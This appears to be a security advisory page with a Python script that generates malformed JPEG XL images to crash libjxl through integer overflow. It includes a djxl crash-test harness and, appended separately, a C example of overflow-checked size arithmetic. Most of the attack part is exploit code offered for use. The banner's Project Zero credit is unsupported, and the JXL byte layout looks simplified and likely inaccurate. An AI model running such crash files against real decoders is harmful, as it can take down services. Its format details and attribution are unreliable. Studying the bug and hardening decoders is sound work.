
📄 Libjxl Integer Overflow

🗓️ 16 Mar 2026 00:00:00 | Reported by indoushka | Type: packetstorm
🔗 packetstorm.news

Tool generates malicious JPEG XL images to test integer overflow in libjxl, with two PoCs.

Code
=============================================================================================================================================
    | # Title     : Libjxl Malicious Image Crafting Integer Overflow Generator                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/libjxl/libjxl/blob/main/lib/jxl/decode.cc                                                                |
    =============================================================================================================================================
    
    [+] Summary    : This Python script generates malicious JPEG XL (JXL) image files designed to test a potential Integer Overflow vulnerability in libjxl. 
                     The tool creates specially crafted JXL images with extremely large dimensions and manipulated headers that can trigger memory miscalculations when processed by vulnerable decoders.
    
    [+] The script produces two proof-of-concept files:
    
    poc32.jxl – targets 32-bit systems, using image dimensions (16384×16384) with RGBA float32 channels that theoretically require ~4 GB of memory, potentially causing integer overflow during allocation.
    
    poc64.jxl – targets 64-bit systems, using extremely large dimensions (2³¹ × 2³⁰ pixels) to stress size calculations inside the decoder.
    
    The generator builds a simplified JXL structure containing:
    
    - A valid JXL signature
    - A jxlc codestream box with an intentionally oversized length
    - A manipulated image header specifying excessive width, height, and channel configuration
    - Random padding to simulate image data
    
    Additionally, the script includes a testing function that attempts to decode the generated file using the djxl tool from libjxl and checks for crashes such as SIGSEGV, which may indicate successful triggering of the vulnerability.
    
    			  
    [+] POC   : 
    
    
    #!/usr/bin/env python3
    
    import struct
    import sys
    import os
    
    def generate_poc_32bit(filename="poc32.jxl"):
        """
        Generates a JXL image to exploit the vulnerability on 32-bit systems.
        Dimensions: 16384×16384 RGBA float32 (4*4*16384*16384 = 4GB)
        """
        print(f"[*] Generating {filename} for 32-bit systems...")
    
        jxl_data = bytearray(b'\xff\x0a') 
    
        box_size = 0xFFFFFFFF 
        box_type = b'jxlc'     
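        # Header bytes followed by random padding. The list must be converted
        # to a bytearray before concatenation (list + bytearray raises TypeError).
        codestream = bytearray([
            0x00, 0x00, 0x00, 0x0C,
            0x4A, 0x58, 0x4C, 0x20,  # ASCII "JXL "
            0x00, 0x40, 0x00, 0x40,  # 0x4000 = 16384, twice (little-endian)
            0x04, 0x04,
            0x00, 0x00,
        ]) + bytearray(os.urandom(1024))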
    
        with open(filename, 'wb') as f:
            f.write(jxl_data)
            f.write(struct.pack('<I', box_size))
            f.write(box_type)
            f.write(codestream)
        
        print(f"[+] Successfully generated {filename}")
        return filename
    
    def generate_poc_64bit(filename="poc64.jxl"):
        """
        Generates a JXL image to exploit the vulnerability on 64-bit systems.
        Maximum dimensions: 2^31 × 2^30 pixels
        """
        print(f"[*] Generating {filename} for 64-bit systems...")
        
        width = 0x80000000  
        height = 0x40000000 
        
        jxl_data = bytearray(b'\xff\x0a')
        
    
        # No whitespace may follow a line-continuation backslash.
        codestream = struct.pack('<II', width, height) + \
                     struct.pack('<BB', 4, 32) + \
                     bytearray(os.urandom(2048))
        
        with open(filename, 'wb') as f:
            f.write(jxl_data)
            f.write(struct.pack('<I', 0xFFFFFFFF))
            f.write(b'jxlc')
            f.write(codestream)
        
        print(f"[+] Successfully generated {filename}")
        return filename
    
    def test_vulnerability(jxl_file, djxl_path="./djxl"):
        """
        Test the vulnerability on the target application.
        """
        import subprocess
        import time
        
        print(f"[*] Testing {jxl_file} on {djxl_path}...")
        
        try:
    
            start = time.time()
            result = subprocess.run([djxl_path, jxl_file, "--disable_output"], 
                                     capture_output=True, timeout=10)
            end = time.time()
            
            if result.returncode == -11:  
                print("[!] Vulnerability Confirmed: Segmentation Fault!")
                return True
            else:
                print(f"[-] Vulnerability not exploited: {result.returncode}")
                return False
                
        except subprocess.TimeoutExpired:
            print("[!] Application did not respond (maybe crash?)")
            return True
        except Exception as e:
            print(f"[!] Error: {e}")
            return False
    
    def main():
        print("="*60)
        print("JXL Integer Overflow PoC Generator")
        print("Google Project Zero - Vulnerability Report")
        print("="*60)
    
        poc32 = generate_poc_32bit()
        poc64 = generate_poc_64bit()
        
        print(f"\n[*] Created Files:")
        print(f"    - {poc32} (32-bit exploit)")
        print(f"    - {poc64} (64-bit exploit)")
        
        print(f"\n[*] To Test:")
        print(f"    $ ./build-i686/tools/djxl {poc32} --disable_output")
        print(f"    $ ./djxl {poc64} --disable_output")
        
    if __name__ == "__main__":
        main()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
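
The size arithmetic behind the two sets of dimensions quoted in the summary, as an added example that is not part of the original advisory and is not libjxl code. It contrasts a blind multiply, which wraps, with an overflow-checked one that rejects the header before any allocation. The function names are hypothetical, and 4 channels of 4 bytes per sample are assumed for both cases.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Blind multiply in a `bits`-wide size type (32 or 64): the running
 * product silently wraps modulo 2^bits, as unsigned arithmetic does. */
uint64_t image_bytes_wrapping(uint64_t w, uint64_t h, uint64_t channels,
                              uint64_t bytes_per_sample, unsigned bits) {
    uint64_t mask = (bits >= 64) ? UINT64_MAX : ((1ULL << bits) - 1);
    uint64_t n = (w * h) & mask;
    n = (n * channels) & mask;
    return (n * bytes_per_sample) & mask;
}

/* a*b -> *out, or false if the product would exceed size_max. */
static bool mul_checked(uint64_t a, uint64_t b, uint64_t size_max,
                        uint64_t *out) {
    if (a != 0 && b > size_max / a) return false;
    *out = a * b;
    return true;
}

/* Hardened form: each step is checked, so an oversized header is rejected
 * instead of producing a small (or zero) allocation size. size_max models
 * SIZE_MAX of the build: UINT32_MAX for 32-bit, UINT64_MAX for 64-bit. */
bool image_bytes_checked(uint64_t w, uint64_t h, uint64_t channels,
                         uint64_t bytes_per_sample, uint64_t size_max,
                         uint64_t *out) {
    uint64_t n = 0;
    return mul_checked(w, h, size_max, &n) &&
           mul_checked(n, channels, size_max, &n) &&
           mul_checked(n, bytes_per_sample, size_max, out);
}

int main(void) {
    uint64_t out = 0;
    /* 16384 x 16384 on a 32-bit size type: 2^32 bytes wraps to 0. */
    printf("32-bit: wrapped=%llu accepted=%d\n",
           (unsigned long long)image_bytes_wrapping(16384, 16384, 4, 4, 32),
           image_bytes_checked(16384, 16384, 4, 4, UINT32_MAX, &out));
    /* 2^31 x 2^30 on a 64-bit size type: 2^65 bytes wraps to 0. */
    printf("64-bit: wrapped=%llu accepted=%d\n",
           (unsigned long long)image_bytes_wrapping(1ULL << 31, 1ULL << 30, 4, 4, 64),
           image_bytes_checked(1ULL << 31, 1ULL << 30, 4, 4, UINT64_MAX, &out));
    return 0;
}
```

A decoder would normally pair the checked multiply with a policy limit on total pixels or bytes, since a size that fits in `size_t` can still be far larger than the service should allocate.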

Vulners AI Score: 5.8 (Medium risk)